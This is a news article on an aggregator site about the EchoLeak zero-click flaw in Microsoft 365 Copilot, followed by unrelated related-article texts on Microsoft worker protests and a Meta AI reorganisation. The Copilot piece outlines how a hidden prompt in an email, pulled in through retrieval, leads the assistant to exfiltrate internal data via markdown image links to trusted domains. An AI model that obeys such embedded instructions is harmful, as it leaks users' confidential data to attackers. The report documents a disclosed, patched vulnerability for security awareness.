AI Security Alarm: Microsoft Copilot Vulnerability Exposed Sensitive Data via Zero-Click Email Exploit
The vulnerability was discovered by Aim Labs in January 2025 and promptly reported to Microsoft. It was fixed server-side in May, meaning users didn't need to take any action themselves. Microsoft emphasized that no customers were affected, and there's no evidence that the flaw was exploited in real-world scenarios.
Still, the discovery marks a historic moment, as EchoLeak is believed to be the first-ever zero-click vulnerability targeting a large language model (LLM)-based assistant.
How EchoLeak Worked
Microsoft 365 Copilot integrates across Office applications like Word, Excel, Outlook, and Teams. It utilizes AI, powered by OpenAI's models and Microsoft Graph, to help users by analyzing data and generating content based on internal emails, documents, and chats.
EchoLeak took advantage of this feature. Here's a breakdown of the exploit process:
A malicious email is crafted to look legitimate but contains a hidden prompt embedded in the message.
When a user later asks Copilot a related question, the AI, using Retrieval-Augmented Generation (RAG), pulls in the malicious email thinking it's relevant.
The concealed prompt is then activated, instructing Copilot to leak internal data through a link or image.
As the email is displayed, the link is automatically accessed by the browser, silently transferring internal data to the attacker's server.
Researchers noted that certain markdown image formats used in the email could trigger browsers to send automatic requests, enabling the leak. While Microsoft's Content Security Policies (CSP) block most unknown web requests, services like Teams and SharePoint are considered trusted by default—offering a way in for attackers.
The Bigger Concern: LLM Scope Violations
The vulnerability isn't just a technical bug—it signals the emergence of a new category of threats called LLM Scope Violations. These occur when language models unintentionally expose data through their internal processing mechanisms, even without direct user commands.
'This attack chain showcases a new exploitation technique... by leveraging internal model mechanics,' Aim Labs stated in their report. They also cautioned that similar risks could be present in other RAG-based AI systems, not just Microsoft Copilot.
Microsoft assigned the flaw the ID CVE-2025-32711 and categorized it as critical. The company reassured users that the issue has been resolved and that there were no known incidents involving the vulnerability.
Despite the fix, the warning from researchers is clear: "The increasing complexity and deeper integration of LLM applications into business workflows are already overwhelming traditional defences,' their report concludes.
As AI agents become more integrated into enterprise systems, EchoLeak is a stark reminder that security in the age of intelligent software needs to evolve just as fast as the technology itself.
Try Our AI Features
Explore what Daily8 AI can do for you:
Comments
No comments yet...
Related Articles
&w=3840&q=100)
First Post
5 minutes ago
- First Post
Why Microsoft workers have taken over company's main campus in Washington
Dozens of current and former Microsoft employees congregated at the tech firm's campus in Washington on Tuesday afternoon to protest against the company's contracts with Israel. The employees, who were also joined by locals, are part of the No Azure for Apartheid group, which itself is part of the No Tech for Apartheid movement The No Azure for Apartheid group took over part of Microsoft's campus which spans around 500 acres in Redmond and recently underwent redevelopment. They set up tents and declared the area a 'liberated zone'. Image courtesy: @NoAz4Apartheid Microsoft has a problem. Its workers in Washington, DC, are in an uproar – and have taken over part of the company's main campus. The issue at hand? The company's defence contracts with Israel. An employee group within the firm has been pressuring the company to cut its ties with Israel. The development came less than a week after Microsoft said it was launching an independent probe into the use of its Azure software. STORY CONTINUES BELOW THIS AD This isn't the first time the employees have raised a hue and cry. But what happened? What do we know? Let's take a closer look: What happened? Dozens of employees, as well as former members of the firm, congregated on Microsoft's campus in Washington on Tuesday afternoon. The employees, who were also joined by locals, are part of the No Azure for Apartheid group – which itself is part of the No Tech for Apartheid movement. The group took over part of the campus which spans around 500 acres in Redmond and recently underwent redevelopment. They set up tents and declared the area a 'liberated zone'. The group said they had changed the name of the area from the East Campus Plaza to 'The Martyred Palestinian Children's Plaza.' They also set up artwork that honoured those who died in Gaza. This included shrouds and a large plate that stated 'Stop Starving Gaza.' They also set up a table with a sign asking Microsoft management to 'come to the table' and cut ties with the Israeli military. The group also published an open letter and manifesto entitled 'We will not be cogs in the Israeli genocidal machine: a call for a Worker Intifada'. The group has called on Microsoft employees to voice their objections, walk off their jobs, and go on strike until Microsoft ceases to do business with the Israeli government and military. The No Azure for Apartheid group has also slammed Microsoft's decision for banning terms such as 'Gaza,' 'genocide,' and 'apartheid' in their internal communications. The group said around 50 people had attended the beginning of the event. Microsoft employs nearly 50,000 people at its Redmond campus. Why are the employees doing this? Hossam Nasr, an ex-Microsoft employee who is leading the protest, said the group had taken this decision because Microsoft refused to respond to their concerns surrounding the use of Azure. Azure is Microsoft's cloud-computing division. It sells software to businesses and governments as well allows them to store data on its servers. The Israeli government and its agencies are among the clients of Azure. An investigation this month revealed that an Israeli military surveillance unit is using Microsoft's Azure software to record phone calls of Palestinians in the West Bank and Gaza. Israel is said to have used this information to choose the locations on which to drop bombs. STORY CONTINUES BELOW THIS AD Nasr told The Guardian, 'We are here because over 22 months of genocide, Israel — powered by Microsoft — has been killing, maiming Palestinian children every hour'. Nasr also cited the death of Al-Jazeera journalist Anas al-Sharif at the hands of the Israeli Defense Forces (IDF) as a reason for this fresh protest. Anas was among five journalists killed in a strike by Israel earlier this month. 'I watched him report on Gaza relentlessly, through starvation, through extermination campaigns, through bombing. He was the voice of the business. He was intentionally targeted,' Nasr, 26, said. Critics of Israel have long accused them of conducting a genocide in Gaza and targeting journalists covering the war. Israel disputes such allegations, however the increasing number of journalists killed in Gaza suggests otherwise. Hossam Nasr, an ex-Microsoft employee who is leading the protest, said the group had taken this decision because Microsoft refused to respond to their concerns surrounding the use of Azure. Image courtesy: Hossam Nasr, an ex-Microsoft employee who is leading the protest, said the group had taken this decision because Microsoft refused to respond to their concerns surrounding the use of Azure. Image courtesy: @NoAz4Apartheid Nasr was earlier fired for leading a protest against Microsoft. The firm has sacked a few members of the No Azure for Apartheid group for holding unauthorised events and disrupting these speeches of its top executives. The latest protests have been clearly inspired by uprisings against Israel on US college campuses. Many students had called for US colleges to cut ties with Israel and adopt the BDS movement, or Boycott, Divestment, and Sanctions, movement. STORY CONTINUES BELOW THIS AD 'Microsoft is the most complicit digital arms manufacturer in Israel's genocide of Gaza,' Microsoft employee Nisreen Jaradat said in a statement on Tuesday. Jaradat told The Guardian, ' Every single second that we wait, things are worse and worse in Palestine. People are getting hungrier and hungrier. More and more people are being bombed and maimed. It's time for us to escalate, however we can.' Julius Shan, another Microsoft employee, added, 'I think we are inspiring conversation among the people who work at Microsoft to feel more comfortable talking about this with each other and about how their work is contributing to genocide'. Some experts have accused Israel of conducting a genocide in Gaza. The United Nations has warned that Gaza faces widespread starvation and disease. The Gaza Health Ministry has said that at least 62,000 Palestinians have been killed since the start of the war – which Israel launched as a response to the October 7, 2023, attacks by Hamas. STORY CONTINUES BELOW THIS AD The group had said it would remain in the plaza until it was forcibly removed. An hour into the protest, a police officer showed up to warn them they were press passing on private property and that there would be arrested. The demonstrators then left the plaza and set up on a sidewalk –which organisers said was public property. A Microsoft spokesperson said the group 'was asked to leave, and they left'. The company in May claimed it had 'found no evidence to date that Microsoft's Azure and AI technologies have been used to target or harm people in the conflict in Gaza'. However Microsoft has since enlisted the Covington & Burlin law firm to conduct an independent review. Previous protests by Microsoft employees This isn't the first time Microsoft employees have taken the company to task over its ties to Israel. In April, Vaniya Agrawal, an Indian-origin engineer, slammed Microsoft's top leadership at a companywide party in Washington. Microsoft at the time was holding an event to celebrate its 50th anniversary with leaders such as Bill Gates, Steve Ballmer, and Satya Nadella in attendance. STORY CONTINUES BELOW THIS AD Vaniya Agrawal later sent an email announcing that she is leaving Microsoft. LinkedIn 'Shame on you all. You're all hypocrites,' Agrawal said at the time. 'Fifty thousand Palestinians in Gaza have been murdered with Microsoft technology. How dare you. Shame on all of you for celebrating on their blood. Cut ties with Israel,' she said. Agrawal was escorted from the event and booed by some fellow Microsoft employees. She later took to LinkedIn to announce her exit from the firm. That same event also saw Ibtihal Aboussad, another Microsoft employee, disrupting the speech of AI chief Mustafa Suleyman. 'Mustafa, shame on you,' Aboussad yelled – which caused Suleyman to halt his address. 'You claim that you care about using AI for good but Microsoft sells AI weapons to the Israeli military. Fifty-thousand people have died and Microsoft powers this genocide in our region.' 'Thank you for your protest, I hear you,' Suleyman responded. But Aboussad wasn't finished. She proclaimed that 'all of Microsoft' has blood on their hands and threw a keffiyeh on stage. The scarf has become a symbol of support for Palestinian people. Aboussad too was removed from the event. STORY CONTINUES BELOW THIS AD In February, five Microsoft employees were thrown out of an internal meeting with Nadella for protesting against the contracts with Israel. More than 60 Microsoft shareholders holding $80 million in the firm have demanded a review to see Microsoft's contracts with Israeli firms are contravening human rights in Gaza. The proposal will likely be taken up at the company's annual general meeting in December.
India Today
19 minutes ago
- India Today
AI hype over? Just months after spending millions of dollars, Meta is suddenly firing AI engineers
Meta's AI division is reportedly going through a big shake-up. According to a Bloomberg report, the company is splitting its AI unit into four different groups, each with a separate focus. On paper, this looks like a way to redefine objectives and avoid confusion. But behind the scenes, AI engineers and researchers seem worried. There are already talks of job cuts and reassignments, even though Meta has spent the last year aggressively hiring AI talent with high other words, this sudden shift in tone from expansion to possible downsizing has left staff unsettled. It has also, as the move comes just days after a rather muted GPT-5 launch from OpenAI, sparked speculation that the AI hype is already slowing down, and suddenly various tech companies might be curtailing their AI ambitions. Restructuring under new leadershipAt Meta, the new structure of the AI division is being led by the company's recently appointed chief AI officer and former CEO of Scale AI, Alexandr Wang. In an internal note, Wang wrote that Meta needs to be better organised if it wants to reach its long-term goal of building superintelligence. 'Superintelligence is coming, and in order to take it seriously, we need to organise around the key areas that will be critical to reach it — research, product and infra,' he wrote. As part of this plan, the AI division — now renamed Meta Superintelligence Labs (MSL) — will run as four teams. One team will handle large language models such as Llama. Another, under the FAIR banner, will continue long-term AI research. A third, led by former GitHub CEO Nat Friedman, will work on consumer-facing AI products. The fourth will focus on infrastructure, including data centres and computing while this may look tidy in theory, not everyone is convinced. As per a New York Times report, Meta is considering firing some AI engineers or moving staff around within its AI workforce, which now numbers several thousand. Of course, nothing is confirmed yet, but the uncertainty has definitely rattled employees. Some executives have already left, adding to the sense of instability. For a division once described as Meta's biggest growth driver, even the possibility of layoffs feels like a sharp the AI hype over?All said, the sudden change raises a bigger question — is the AI hype beginning to cool off? This is particularly a relevant question given that Meta's move comes just days after OpenAI launched a muted ChatGPT-5, which didn't impress users as much as the company's earlier AI models did. advertisementOver the last two years, AI has dominated headlines, and companies have rushed to call themselves AI-first. But just like previously hyped technologies — blockchain or the metaverse — is AI also going the same way, or is it real?Take DeepSeek, for example. It grabbed attention almost overnight with a free, powerful model that could rival OpenAI's ChatGPT and Google's Gemini. But since then, it has gone quiet, and the excitement has a day ago, a report highlighted that many organisations that tried to make AI part of their workflow have not been very successful. The Study by MIT — titled State of AI in Business 2025 — found that only about 5 per cent of AI pilot projects actually lead to rapid revenue growth, while the vast majority stall or fail to deliver impact. 'Almost everywhere we went, enterprises were trying to build their own tool,' said Aditya Challapally, the lead author of the OpenAI CEO Sam Altman is now admitting that the industry is in a kind of bubble, although he qualifies it in terms of short run and long run. According to a Verge report, Altman said, 'When bubbles happen, smart people get overexcited about a kernel of truth. Are we in a phase where investors as a whole are overexcited about AI? My opinion is yes. Is AI the most important thing to happen in a very long time? My opinion is also yes.'advertisementBut is it really an AI slowdown at Meta?While there are some signs of the AI train slowing down, the events at Meta AI could be something else entirely — that is just a regular, good old restructuring. It is possible that the shake-up is indeed more about efficiency. With Meta splitting its AI division into four clear teams could reduce duplication of work and make accountability easier. And, if the job cuts do happen, they may be about trimming overlapping roles rather than pulling back on AI altogether.- Ends
Time of India
an hour ago
- Time of India
Microsoft sees biggest escalation yet of protests over Palestine; "Liberated Zone" created in campus and more
Microsoft employees occupied company headquarters Tuesday in the most significant protest yet against the tech giant's contracts with Israel, establishing an encampment they renamed " Martyred Palestinian Children's Plaza ." Around 50 current and former Microsoft workers, alongside community supporters, took over the East Campus Plaza at the company's Redmond, Washington headquarters as part of escalating demonstrations by the " No Azure for Apartheid " group. The protesters set up tents, erected memorials to Gaza casualties, and established a negotiating table inviting Microsoft executives to "come to the table" and end partnerships with the Israeli military. The demonstration ended after approximately two hours when police ordered protesters to leave, threatening arrests for trespassing. A Microsoft spokesperson confirmed the group "was asked to leave, and they left" but provided no additional comment beyond previous statements. Employees demand complete divestment from Israeli partnerships The activists distributed a manifesto titled "We will not be cogs in the Israeli genocidal machine: a call for a Worker Intifada," demanding Microsoft cut all ties with Israel, call for an end to the conflict, pay reparations to Palestinians, and stop discriminating against pro-Palestinian workers. by Taboola by Taboola Sponsored Links Sponsored Links Promoted Links Promoted Links You May Like The 5 Books Warren Buffett Recommends You To Read in 2025 Blinkist: Warren Buffett's Reading List Undo The group has spent over a year pushing Microsoft to end its relationship with Israel, arguing the company's Azure cloud platform contributes to civilian deaths in Gaza by serving Israeli government and military agencies. Several organizers have been terminated for holding unauthorised campus events and disrupting executive speeches, including interruptions of CEO Satya Nadella's presentations. Investigation reveals surveillance concerns amid ongoing worker resistance The protest follows recent reporting by The Guardian and +972 Magazine revealing Israel's military surveillance unit stored millions of Palestinian phone calls on Azure servers, with that data helping inform Gaza bombing targets. Microsoft enlisted law firm Covington & Burling to conduct an independent review of these allegations, though the company maintains it has "found no evidence" its technologies have been used to target civilians. The demonstrations were also motivated by the recent targeted killing of prominent Al Jazeera journalist Anas al-Sharif , according to protester Hossam Nasr, a former Microsoft employee who was fired last year for organizing a Palestine vigil.
